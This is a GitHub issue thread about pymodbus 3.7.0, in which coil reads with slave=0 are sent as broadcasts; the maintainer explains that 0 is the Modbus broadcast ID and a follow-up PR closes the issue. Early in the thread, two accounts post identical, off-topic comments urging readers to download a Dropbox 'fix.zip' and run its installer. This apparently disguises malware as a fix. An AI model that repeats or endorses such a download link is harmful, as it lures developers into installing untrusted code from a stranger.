pymodbus-dev/pymodbus #2297: v3.7.0 Coil read actually send broadcast write

ulfaric, 2024-08-26:
### Versions

- Python: 3.12
- OS: win11
- Pymodbus: 3.7.0
- Modbus Hardware (if used):

### Pymodbus Specific

- Server: tcp/rtu/ascii - sync/async
- Client: tcp/rtu/ascii - sync/async

### Description

in  3.7.0, when call client.read_coils(), it sends a broadcast write rather than read.

### Code and Logs

```python
# code and logs here.

# please use the following to format logs when posting them here
import pymodbus

pymodbus.pymodbus_apply_logging_config("DEBUG")
```

seeronline, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

llowvxe, 2024-08-26:
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

janiversen, 2024-08-26:
You do not show your code, so it is impossible to help you.

Probably you have forgotten the slave parameter, please see the documentation.

ulfaric, 2024-08-26:
Hi Jan

Reverse back 3.8 fixed the issue. My codes remained same, it is clear a issue of 3.9

ulfaric, 2024-08-26:
Hi Jan

No, I mean the version of pymodbus, not the python version. I reversed back to one version earlier of pymodbus without changing any of my codes and the issue disappeared.

Pymodbus 3.9 has the read coils function broken.

Closed #2297<https://github.com/pymodbus-dev/pymodbus/issues/2297> as not planned.

janiversen, 2024-08-27:
That is impossible! we have not even defined version 3.9 yet !

Our current version is 3.7.0

You still have not shared your code, so I cannot tell you if your code have been updated properly to 3.7+

Also you have still not made a debug log so we can see what is actually
happening.

ulfaric, 2024-08-27:
Ops, I mean 3.6.9 is broken. 3.6.8 is working

ulfaric, 2024-08-27:
3.7.0 is broken too 😢

janiversen, 2024-08-27:
Please submit your code and debug log (see the description you added, it contains the instructions).

The difference between 3.6.8 and 3.6.9 should not contain any function code changes, so I am confused as to how it can send a wrong function call.

Please add:
- the code containing the call that is wrong
- a debug log showing the call and the hex string sent on the line
- explain "broadcast write", do you the the device id or a different function code ?

without these 3 items I cannot help you.

janiversen, 2024-08-27:
Have a look at API_changes.rst ! but yes there are api changes since it is a x.y version…the only versions without API changes are x.y.z

the API changes in 3.7.0, does not affect well behaved programs, but only programs the violate the call signatures, and 3.7.0 adapted code can be used with all 3.6.z versions.

ulfaric, 2024-08-27:
> This is happening because you are NOT addressing your device, but relying on default, which is to send the message with the broadcast id. It does NOT change the function code.
>
> Please read our documention, or at the very least follow the signature (especially in 3.7.0) of the call that details the parameters.

Hi Jan

Here is a screen shot of my last layer of wrapper before calling the functions of pymodbus client. As you can see, the slave is always addressed.

I am not sure where is issue, and I checked your docs, there seems to be no changes for read_coils()

[cid:b8ddbcc9-e269-492f-8082-b843640c9a10]

janiversen, 2024-08-27:
There are not screen shot, just copy/paste the call that is easier.

You probably use slave as a positional parameter which are likely to cause problems, or have slave=0, which is the broadcast id, so the message is correct.

ulfaric, 2024-08-27:
Hi Jan

I found the problem. 3.6.8 allows a slave to have ID 0. But 3.7.0 does not, if the slave ID is 0, it will lead to a broadcase.

janiversen, 2024-08-27:
That is NOT true !!!

slave=0 is broadcast pr modbus definition, the difference is that in 3.6.8 pymodbus falsely returned the first response instead of returning without waiting for response as the protocol defines.

janiversen, 2024-08-27:
3.7.1 will for other reasons, return the first response and disconnect if there are further responses when slave=0

janiversen, 2024-08-27:
Hmmm…..you might like things to start with 0, but it actually does not depend on you, but on the device you are addressing.

janiversen, 2024-08-27:
Reopen as a 3.7.1 reminder.

PR #2298 (2024-08-27): Slave=0 will return first response, used to identify device address.

fixes #2297
closed 2024-08-27 by janiversen